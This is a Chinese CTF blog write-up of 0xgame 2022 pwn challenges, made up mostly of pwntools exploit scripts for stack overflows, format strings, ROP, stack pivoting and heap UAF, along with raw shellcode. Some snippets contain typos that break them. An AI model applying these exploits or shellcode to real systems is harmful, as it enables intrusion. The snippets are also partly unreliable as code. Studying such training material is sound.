首页 > 其他分享 >0xgame2022 PWN week1-4

0xgame2022 PWN week1-4

时间:2022-11-01 17:34:16浏览次数:70  
标签:p64 libc ret week1 base pop 0xgame2022 PWN pl

0xgame week1

pwn1

签到的nc,cat flag

pwn2

ret2backdoor,一个栈溢出

#encoding = utf-8
from pwn import *
import os
import sys
import time
#from ae64 import AE64
#from LibcSearcher import * 

context.os = 'linux'
context.arch = 'amd64'
#context.arch = 'i386'
context.log_level = "debug"


name = './pwn2'

debug = 1
if debug:
    p = remote('49.233.15.226',8002)
else:
    p = process(name)


libcso = '/lib/x86_64-linux-gnu/libc.so.6'
#libcso = './'
libc = ELF(libcso)
#libc = elf.libc
elf = ELF(name)

context.terminal = ['gnome-terminal','-x','sh','-c']

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,'\x00'))
uu64    = lambda data               :u64(data.ljust(8,'\x00'))
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

add_idx = 1
delete_idx = 2
show_idx = 4
edit_idx = 3

def dbg():
   gdb.attach(proc.pidof(p)[0])
   pause()
  
'''
def choice(cho):
    sla('enter your command: \n',cho)

def add(idx):
    choice(add_idx)
    sla('choise:',idx)

def delete(idx):
    choice(delete_idx)
    sla('Index: \n',idx)

def show(idx):
    choice(show_idx)
    sla('Index: ',idx)

def edit(idx,content):
    choice(edit_idx)
    sla('Index: ',idx)
    p.sendlineafter('Message: \n',content)
'''

sys = 0x40123d
main = 0x4011FB
pl = b'a'*0x58+p64(sys)

p.recvuntil('ret2text?\n')
p.sendline(pl)
#dbg()

p.interactive()

'''
def pwn():

if __name__ == '__main__':
    pwn()
'''

#print('========================================================================================')

'''
pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()

pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()

pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()

pop_rdx12_ret = libc_base + libc.search(asm('pop rdx;pop r12;ret;')).__next__()

leave_ret = libc_base + libc.search(asm('leave;ret;')).__next__()

bin_sh = libc + libc.search('/bin/sh').next()

open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
puts_addr = libc_base + libc.sym['puts']

gadget = libc_base + libc.sym['svcudp_reply'] + 0x1a
li('gadget = '+hex(gadget))

'''
'''
mov    rbp,QWORD PTR [rdi+0x48]
mov    rax,QWORD PTR [rbp+0x18]
lea    r13,[rbp+0x10]
mov    DWORD PTR [rbp+0x10],0x0
mov    rdi,r13
call   QWORD PTR [rax+0x28]
'''
#print('========================================================================================')


'''
def ret2libc_leak(main,got,plt,offset):
    if x64_32:
        payload = b'a'*offset + b'b'*8 + p64(rdi) + p64(got) + p64(plt) + p64(main)
    else:
        payload = b'a'*offset + b'b'*4 + p32(plt) + p32(main) + p32(got)
    return payload

def fmt_w(flag,num,offset):
    if flag==2:
        payload = b'%' + str(num) + b'c' + b'%' + str(offset) + b'$hn'
    elif flag==1:
        payload = b'%' + str(num) + b'c' + b'%' + str(offset) + b'$hhn'
'''
#print('========================================================================================')

'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''
#print('========================================================================================')

'''
def dbg(cmd=''):
    os.system('tmux set mouse on')
    context.terminal = ['gnome-terminal','-x','sh','-c']
    gdb.attach(p,cmd)
    pause()

command = 'b *'+ str(hex(gadget))+'\n'
dbg(command)
'''
#print('========================================================================================')


pwn3

经典的ret2text

sys = 0x0401080
sys_ls = 0x040124D
bin_sh = 0x0404048

pop_rdi_ret = 0x4012c3
ret = 0x40101a

pl = b'a'*0xa8 + p64(ret)+ p64(pop_rdi_ret) + p64(bin_sh) + p64(sys)
p.sendafter('me?\n',pl)
pwn4

ret2shellcode,将shellcode填入buf处再填满溢出回buf处即可

shellcode=asm(shellcraft.sh())
print(shellcode)

p.recvuntil(':')
buf_addr  = int(p.recv(15),16)
li('buf_addr  = '+hex(buf_addr))
shellcode_addr = buf_addr + 0x58 + 8
li('shellcode_addr  = '+hex(shellcode_addr))

p.recvuntil('something?')
shell=b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

pl = shell.ljust(88,b'\x00')+p64(buf_addr)
#pl = b'a'*0x58 + p64(shellcode_addr) + shellcode
p.sendline(pl)

#dbg()
pwn5

ret2libc,给了puts地址所以可以直接获取libc基地址

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
ret = 0x40101a
pop_rdi_ret = 0x4012f3
main = 0x040121B
p.sendlineafter('words?\n','-255')

pl = b'a'*0x58+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)

p.sendline(pl)

libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['puts']
li('libc_base = '+hex(libc_base))

#dbg()
sys = libc_base + libc.sym['system']
bin_sh = libc_base + 0x1b45bd

p.sendlineafter('words?\n','-255')

pl = b'a'*0x58+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(sys)

p.sendline(pl)

pwn6

一个ret2csu

x7J6KA.png

gadgets1 = 0x000000000040130a

gadgets2 = 0x00000000004012f0

x7Jgbt.png

execve:

x7JcDI.png

x7JRVP.png

x7JWUf.png

gadget1_addr = 0x40130A 
gadget2_addr = 0x4012F0 
bin_sh_addr = 0x40201D 

def com_gadget(addr1 , addr2 , jmp2 , arg1 , arg2 , arg3): 
    payload = p64(addr1) + p64(0) + p64(1) + p64(arg1) + p64(arg2) + p64(arg3) + p64(jmp2) + p64(addr2) + b'a'*56 
	return payload 

payload = b'a'*0x50 + b'b'*0x8 +
payload += com_gadget(gadget1_addr, gadget2_addr, elf.got['execve'], bin_sh_addr, 0, 0)

p.sendafter(b'Plz tell me sth : ', payload) 
p.sendline(b'cat flag 1>&0')
gift

x7J4PS.png

一个利用点是system("$0") 等价于 system("/bin/sh")

libc文件放进IDA中可以看到puts调用了j_strlen这个函数(其实在libc 中也只有 j_xxx 的函数才会有 plt 表与 got 表),所以直接将 libc 中 j_strlen() 函数的 got 表改为 system 函数即可

x7J58g.png

到改其调用的其他某个函数在 libc 中的 got 表为 system ,并保证此时 rdi 依然是 $0 即可(也就是在 libc 的 puts 中找到它最先调用的那个函数最保险)

x7Jbbq.png

将libc_strlen_got写入buf中去

p.sendlineafter("address:\n", hex(libc_strlen_got)) 

x7JOaV.png

p.sendafter("content:\n", p64(system_addr)[:5])
#只能读进5位,但前面都是相同的,所以将sys的后5位送进去就可以修改got表里的__strlen_avx2

x7JI2Q.png

p.recvuntil("gift:\n") 

libc_base = int(p.recvline().strip(b"\n"), 16) - libc.sym['puts'] 

li("libc_base:\t" + hex(libc_base)) 

libc_strlen_got = libc_base + 0x1EC0A8 
li('libc_strlen_got ='+hex(libc_strlen_got))
system_addr = libc_base + libc.sym['system'] 


#p.sendlineafter("address:\n", b'bbbb') 

p.sendlineafter("address:\n", hex(libc_strlen_got))  


print(b'1 = '+ p64(system_addr))
print(b'2 = '+ (p64(system_addr)[:5]))
dbg()

'''
p.sendafter("content:\n", b'aaaaa')
'''
p.sendafter("content:\n", p64(system_addr)[:5])

week2

pwn1

格式字符串漏洞,利用达成a = 66就可以getshell


a_addr = 0x404050
payload = fmtstr_payload(6, {a_addr:66})
p.recvuntil('format?\n')
p.sendline(payload)
p.interactive()

pwn2

卡了一会,最后做出来的这个

这个有后门,给了两个格式字符串漏洞,还给了glibc,着实被迷惑住了,方向想歪了

其实只要第二次输入的时候将puts的got表改成backdoor,当read完后,执行到下面puts就相当于触发后门了

backdoor = 0x40121B
p.recvuntil('something?\n')
pl = '%1$p-%3$p'
p.sendline(pl)
'''
stack = int(p.recv(14),16)
li(hex(stack))
'''
p.recvuntil('-')
libc = int(p.recv(14),16)-0x10DFD2
li(hex(libc))

p.recvuntil('deeper')
'''
pl = b'a'*0x68+p64(backdoor)
p.sendline(pl)
#dbg()
'''
pro = ELF("./pwn2")
puts_got = pro.got["puts"]
system_plt = pro.plt["system"]
pl = fmtstr_payload(8, {puts_got:backdoor})
p.send(pl)

p.interactive()
pwn3

开了pie,通过第一次输入的格式字符串漏洞泄露出改一下就能拿到backdoor地址了

但要注意的点是这个后门需要加上偏移,不然跳到的不是正确的位置

bd = 0x122E
p.recvuntil('name?\n')
pl = '%27$p'
p.sendline(pl)
#1
magic = int(p.recv(12)+b'2E',16)
li('magic = '+hex(magic))
#2
#dbg()
p.recvuntil('getshell?\n')
pl = b'a'*0x88+p64(magic+6)
p.sendline(pl)

p.interactive()
pwn4

无后门,泄露并获取canary和libc基址

第二次栈溢出即可

bd = 0x122E
p.recvuntil('name?\n')
pl = '%3$p-%23$p'
p.sendline(pl)

libc = int(p.recv(14),16)
libc_base = libc-0x10DFD2
li('libc_base = '+hex(libc_base))
p.recvuntil('-')
canary = int(p.recv(18),16)
li(hex(canary))

sys = libc_base + 0x52290
bin_sh = libc_base + 0x1b45bd

ret = 0x000000000040101a
pop_rdi_ret = 0x0000000000401323


#dbg()
p.recvuntil('getshell?\n')
pl = b'a'*0x88+p64(canary)+b'b'*0x8
pl += p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(sys)
p.sendline(pl)

p.interactive()
pwn5

x7JHrn.png

x7YSxJ.png

区别于上个题,最后有个奇怪的东西

x7Jz24.png

pl = b'%39$p%40$p%43$p'
p.recvuntil('name?\n')
p.sendline(pl)

canary = int(p.recv(10),16)
li(hex(canary))
stack = int(p.recv(10),16)
li(hex(stack))
libc_base = int(p.recv(10),16) - (0xf7ce84a0-0xf7cc7000) -121 
#-libc.sym['__libc_start_call_main']-121
li('libc_base = '+hex(libc_base))

system_addr = libc_base + libc.sym['system'] 
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))

payload = b'a'*0x80 + p32(canary) + p32(stack - 0x10) + b'b'*4 + b's'*4

stack-0x10:

x7JvPU.png

payload = b'a'*0x80 + p32(canary) + p32(stack - 0x10) + b'b'*4 + b's'*4 # b'a'*12 
payload += p32(system_addr) + b'c'*4 + p32(binsh_addr)

dbg()
p.sendlineafter("Do you know how to getshell?\n", payload)

week3

pwn1

禁execve,有次较大的read

x7UxT1.png

x7UvwR.png

x7Ujm9.png

x7aSFx.png

利用思路:

首先获取libc,再返回main地址

然后构造一个read写到bss+0x500,再返回main地址

接着通过这次读将构造好的orw写入上面的bss+0x500

接下来栈迁移bss+0x4f8到栈上执行(注意栈帧的调整)

获取libc

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
read_got = elf.got['read']
main_addr = 0x4012ff
getflag = 0x404048

pop_rdi_ret = 0x4013b3
ret = 0x40101a
bss = elf.bss()
li('bss = '+hex(bss))

p.recvuntil('try\n')
pl = b'a'*0x28 +p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendline(pl)

libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['puts']
li('libc_base'+hex(libc_base))

open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
puts_addr = libc_base + libc.sym['puts']

pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()

pop_rax_ret = libc_base + libc.search(asm('pop rax;ret;')).__next__()

pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()

pop_rdx12_ret = libc_base + libc.search(asm('pop rdx;pop r12;ret;')).__next__()

pop_rsi15_ret = libc_base + libc.search(asm('pop rsi;pop r15;ret;')).__next__()

leave_ret = libc_base + libc.search(asm('leave;ret;')).__next__()

syscall = libc_base + libc.sym['syscall']


构造一个read(0,bss+0x500,100)写到bss+0x500,再返回main地址

p.recvuntil('try\n')

poc=b'a'*0x28
poc += p64(pop_rdi_ret)
poc += p64(0)
poc += p64(pop_rsi_ret)
poc += p64(bss+0x500)
poc += p64(pop_rdx12_ret)
poc += p64(0x100)+p64(0)
poc += p64(read_addr)
poc += p64(main_addr)

p.send(poc)

通过这次读将构造的orw写入上面的bss+0x500

# open(0x404048'./flag',0)
pl= p64(pop_rdi_ret)+p64(0x404048)+p64(pop_rsi_ret)+p64(0)+p64(open_addr)
# read(4,bss+0x500,0x50,0)
pl+= p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(bss+0x700)+p64(pop_rdx12_ret)+p64(0x50)+p64(0)+p64(read_addr)
# puts(bss+0x500)
pl+= p64(pop_rdi_ret)+p64(bss+0x700)+p64(puts_addr)

p.sendline(pl)

栈迁移

payload = b'a'*0x20
payload += p64(bss+0x4f8)
payload += p64(leave_ret)
#dbg()
p.sendline(payload)

''''''
图一
payload = b'a'*0x28
payload += p64(bss+0x4f8)
payload += p64(leave_ret)

图三
payload = b'a'*0x20
payload += p64(bss+0x500)
payload += p64(leave_ret)
''''''

x7apY6.png

x7a9fK.png

pwn2

和pwn1的区别在read读的少0x50

x7aPSO.png

但我们上个exp中每次payload就写的不算多,也就可以直接套第一个用

pwn3

两次read,第一次读到mmap分配的地址

第二次读很小,只要0x10能溢出

x7ailD.png

图床不够放了,明天有空再放下面的吧

image-20221019091212309

栈迁移

pl = p64(main_addr)+p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt)+ p64(main_addr) + p64(0x405000)+b'/bin/sh\x00'
  
# + p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_ret) + p64(0x405000+0x50) +p64(0) + p64(0x405000elf.sym['read']) 
  
p.sendlineafter('name\n',pl)
pl = b'a'*0x60+ p64(0x405000) + p64(leave_ret)

p.sendafter('pivoting?\n',pl)

libc_base = uu64(r(6))-libc.sym['puts']

pop_rdx_ret = libc_base + 0x0000000000142c92
system = libc_base + libc.sym['system']
binsh = 0x30 + 0x405000

x7aF6e.png
image-20221019091219125

image-20221019092104370

p64(pop_rsi_ret) + p64(0) + p64(0) + p64(pop_rdx_ret) + p64(0)将rsi和rdx置零达成调用onegadgte的前提

调整栈帧跳到p64(0x404fe8),避免写入0x405000的onegadget被0覆盖

pl = b'' #p64(pop_rdi_ret) + p64(binsh) + p64(system)

p.sendlineafter('name\n',pl)
og = libc_base + 0xe3b04

pl = b'a'*0x30 + p64(pop_rsi_ret) + p64(0) + p64(0) + p64(pop_rdx_ret) + p64(0) + p64(og)+ p64(0x404fe8) +p64(leave_ret)

p.sendafter('pivoting?\n',pl)

image-20221019094409793

image-20221019094454177

image-20221019095618845

pwn4

image-20221020210427045

image-20221020210757226

想较于前一题减去了第一次读入mmap分配地址的read

我们选择将shellcode写入bss段0x0404040,再栈迁移执行

image-20221020212016071

第一次构造read(bss+0x150)

获取puts真实地址再转到read为后面进行下一次溢出

填满0x50后,进行栈迁移来执行来获取libc_base

获取libc基址后将onegadget送入,填满并对齐后进行栈迁移来执行

但要注意栈帧的调整

def pwn():
    pl = b'a'*0x50 + p64(0x0404040 + 0x150) + p64(0x004011FD) #bss+0x150  read
    #debug()
    p.sendafter('do you know stack pivoting?\n',pl)
    puts_got = elf.got['puts']
    puts_plt = elf.plt['puts']
    pl = p64(0x0404040 + 0x100) + p64(0x0401283) + p64(puts_got) + p64(puts_plt) +p64(0x004011FD) #rdi read
    pl = pl.ljust(0x50,b'\x00')
    pl += p64(0x0404040 + 0x100) +p64(0x040121d) #leave_ret
    p.send(pl)
    
    libcbase = uu64(r(6)) - libc.sym['puts']
    leak('libcbase',libcbase)
    pl = p64(0x000000000002601f + libcbase) + p64(0) + p64(libcbase + 0x0000000000142c92) + p64(0) + p64(libcbase + 0xe3b04) #rsi rdx og
    pl = pl.ljust(0x50,b'a')
    pl += p64(0x0404040 + 0xa8) + p64(0x040121d) #调栈帧 leave_ret
    p.send(pl)

    itr()

if __name__ == '__main__':
    pwn()
whitegive_1

保护全开

image-20221021150220900

flag被读到stream和unk_4080

image-20221021150312356

送了libc基址,有4次任意读

p.recvuntil('gift :')
libcbase = int(p.recv(15),16) - libc.sym['puts']
li('libc_base = '+hex(libcbase))
en = libcbase + libc.sym['__environ']
pl = p64(en)
p.sendafter('Please input the address you want to query : ',pl)
stack  = uu64(r(6))
leak('stack',stack)
dbg()
pl = p64(stack-0x30)
p.sendafter('Please input the address you want to query : ',pl)
pie = uu64(r(6)) - 0x118e
leak('pie',pie)
flag = pie + 0x4080
pl = p64(flag)
p.sendafter('Please input the address you want to query : ',pl)
pl = p64(stack - 0x168)
p.sendafter('Please input the address you want to query : ',pl)
itr()

第一次获取stack地址

en = libcbase + libc.sym['__environ']
pl = p64(en)
p.sendafter('Please input the address you want to query : ',pl)
stack  = uu64(r(6))
leak('stack',stack)

0x7fff4419f708-0x30处找到一处程序地址

image-20221021150930488

pl = p64(stack-0x30)
p.sendafter('Please input the address you want to query : ',pl)
pie = uu64(r(6)) - 0x118e
leak('pie',pie)

破解了pie,然后读取bss段的后半段flag

flag = pie + 0x4080
pl = p64(flag)
p.sendafter('Please input the address you want to query : ',pl)

再读取前半段flag

image-20221021151409874

image-20221021151342352

pl = p64(stack - 0x168)
p.sendafter('Please input the address you want to query : ',pl)
whitegive_1_plus

4次改为两次读

在只有libc基址的情况下获取进程地址

我们找到了stderr处

image-20221021153010059

stderr = libc_base +  0x1EBDB0
li(hex(stderr))
p.sendafter('query :',p64(stderr))

打两次分别获取前后两端flag

flag = uu64(r(6))-0x4040+0x4080
li(hex(flag))
p.sendafter('query :',p64(flag))

'''
p.sendafter('query :',p64(environ))
p.recv()
stack = uu64(r(6))
li('stack = '+hex(stack))

dbg()
pl = p64(stack - 0x168)
p.sendafter('query :',pl)
'''
whitegive_2

image-20221021154528018

image-20221021154615148

一次格式字符串任意读

一次0x10大小溢出

分别读了libc和stack

onegadget + 栈迁移

def pwn():
	pl = '%8$p%1$p'
	
	p.sendafter('Please leave your name :\n',pl)
	ru('Hello, ')
	libcbase = int(r(14),16) - 0x7fa72ecdf2e8 + 0x7fa72eaee000
	leak('libcbase',libcbase)
	stack = int(r(14),16)
	leak('stack',stack)
	
	leave = libcbase + 0x00000000000578c8
	og = libcbase + 0xe3b04
	li(hex(og))
	rsi = libcbase + 0x000000000002601f
	li(hex(rsi))
	rdx = libcbase + 0x0000000000142c92
	
	pl = p64(rdx) + p64(0) + p64(rsi) + p64(0) + p64(og)
	pl = pl.ljust(0x30,b'\x00')
	
	pl += p64(stack+1) + p64(leave)
	
	p.sendafter('Now, please send your message :\n',pl)
	
	itr()

if __name__ == '__main__':
    pwn()

image-20221021160617126

image-20221021160627771

image-20221021161132608


payload = b'A' * 24 + p64(addr_pop4) + p64(addr_pop_rdi) + p64(elf.got['write']) + p64(elf.symbols['puts']) + p64(elf.symbols['main'])
whitegive_3

ret2dl-resolve

payload = p64(0x4012AA)+p64(0)+p64(1)+p64(0)+p64(0x404020)+p64(0x1)+p64(0x404028)+p64(0x40 1290) 

payload += p64(0)+p64(0)+p64(1)+p64(0)+p64(0x404100)+p64(0x900)+p64(0x404028)+p64(0x401290) 

payload += p64(0)+p64(0)+p64(1)+p64(0x404100)+p64(0)+p64(0)+p64(0x404020)+p64(0x401290) 

p.send(b"a"*32+p64(0)+payload) sleep(1) 

p.send(b'\x15') 

sleep(1) 

p.send(b'/bin/sh\x00'+b'a'*0x33) 

p.sendline("exec 1>&0")

week4

pwn1

UAF

image-20221023131908790

image-20221023131700423

edit(6,0x80,p64(free_hook))

image-20221023131734462

def choice(cho):
    sla('>> ',str(cho))

def add(index,size,content):
    choice(add_idx)
    sla('\n',str(index))
    sla('\n',str(size))
    sa('\n',content)

def delete(index):
    choice(delete_idx)
    sla('\n',str(index))

def show(index):
    choice(show_idx)
    sla('\n',str(index))

def edit(index,size,content):
    choice(edit_idx)
    sla('\n',str(index))
    sla('\n',str(size))
    sla('\n',content)

for i in range(8):
	add(i,0x80,'\n')

for i in range(7):
	delete(i)

add(8, 0x10, '\n')
delete(7)
add(8, 0x40, '\n')


show(8)
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-138-0x10-libc.sym['__malloc_hook']
li(hex(libc_base))


system = libc_base + libc.sym['system']
bin_sh = libc_base + 0x7fbc1675d5bd - 0x7fbc165a9000
free_hook = libc_base + libc.sym['__free_hook']
li(hex(free_hook))
pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()
pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()


edit(6,0x80,p64(free_hook))


def add2(index,size,content):
    choice(add_idx)
    sla('\n',str(index))
    sla('\n',str(size))
    sla('\n',content)
    
add2(0,0x80,b'0')
add2(0,0x80,p64(system))
add2(0,0x10,b'/bin/sh\x00')

delete(0)
pwn2

相较前一题没了edit

image-20221101142559112

一开始卡住了,将b去掉即可

image-20221101163312242

add(20,0x10,b'/bin/sh\x00') --》 add(20,0x10,'/bin/sh\x00')

exp:

add(0,0x1000,'aaa')
add(20,0x10,'/bin/sh\x00')
delete(0)
show(0)

libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) -96 -0x10 -libc.sym['__malloc_hook'] #-0x2a
li('libc_base = '+hex(libc_base))

pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()
pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
pop_rdx12_ret = libc_base + libc.search(asm('pop rdx;pop r12;ret;')).__next__()
leave_ret = libc_base + libc.search(asm('leave;ret;')).__next__()
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
puts_addr = libc_base + libc.sym['puts']
syscall = libc_base + libc.sym['syscall']
system = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']

for i in range(9):
	add(i,0x10,'\n')

for i in range(9):
	delete(i)

delete(7)

for i in range(7):
	add(i+2,0x10,'\n')


def add2(index,size,content):
    choice(add_idx)
    sla('\n',str(index))
    sla('\n',str(size))
    p.sendafter('\n',content)
    
add2(11,0x10,p64(free_hook))
add2(12,0x10,'\n')
add2(13,0x10,'\n')
add2(14,0x10,p64(system))

p.recvuntil(b'>> ')
p.sendline("2")


p.recvuntil(b'Please input index\n')
p.sendline("20")

标签:p64,libc,ret,week1,base,pop,0xgame2022,PWN,pl
From: https://www.cnblogs.com/shuzM/p/16848269.html

相关文章

  • pwn2_sctf_2016
    "【符号位漏洞+ret2libc】【Write-up】BUUCTFpwn2_sctf_2016原题链接"【符号位漏洞+ret2libc】【Write-up】BUUCTFpwn2_sctf_2016checksec查看程序架构ida查看程序......
  • DASCTF X GFCTF 2022十月挑战赛 pwn wp
    目录1r()p21!5!3magic_book随便做了下。1r()p利用如下几个gadgets构造即可:#控制rax后任意地址写.text:000000000040115Amovrsi,rax......
  • 1.2.2 musl pwn
    1.2.2muslpwn几个结构__malloc_context(与glibc中的main_arena类似)structmalloc_context{uint64_tsecret;#ifndefPAGESIZEsize_tpagesize;#endif......
  • [BUUCTF]Pwn刷题记录
    本部分内容长期更新,不再创建新文章影响阅读rip根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller'srbp的数据填满,在这里......
  • BUUCTF [NewStarCTF] Week1 WEB NotPHP 详解
    NotPHP<?phperror_reporting(0);highlight_file(__FILE__);if(file_get_contents($_GET['data'])=="WelcometoCTF"){if(md5($_GET['key1'])===md5($_GET['k......
  • 利用 patchelf 修改 pwn 题目的 libc
    pwn有时候真的太玄学了(我太菜了),有时候因为环境问题导致一道题很难调试成功,跟wp上的差很多,有时候调试几天也不知道怎么回事,换个环境突然就好了。特别是到堆的时候,搞了好几......
  • 带有pwn环境的Ubuntu22.04快速安装
    pwn环境ubuntu22.04快速安装(有克隆vmk)ubuntu更新到了22.04版本,经过本人测试后非常的好(ma)用(fan),该版本和mac很相像,而且用起来也比较丝滑,只不过配置上稍微有一些多,也比较繁琐......
  • BUUCTF-PWN-第一页writep(32题)
    温故而知新,可以为师矣。所以花了几天时间重新做了下buuctf的pwn题,先发下第一页共32题的题解。还有如果题解都很详细那么本文就太长了,写起来也浪费时间,所以比较简单......
  • NewStarCTF学习笔记-WEEK1
    WEEK1returntotext[text区域]​ 通过向栈上堆砌长度足够且合适的"垃圾信息"改写ret指令指向的地址,执行对应函数​ 注意点:保护,遇上Canary要进行绕过常见的Cana......
  • pwn题工具整理
    目录语言汇编C语言指针数据类型文件缓冲区和流操作系统编译链接加载运行保护机制格式化字符串漏洞printf函数族x86和x64使程序崩溃读取栈上数据任意地址读取任意地址写工具......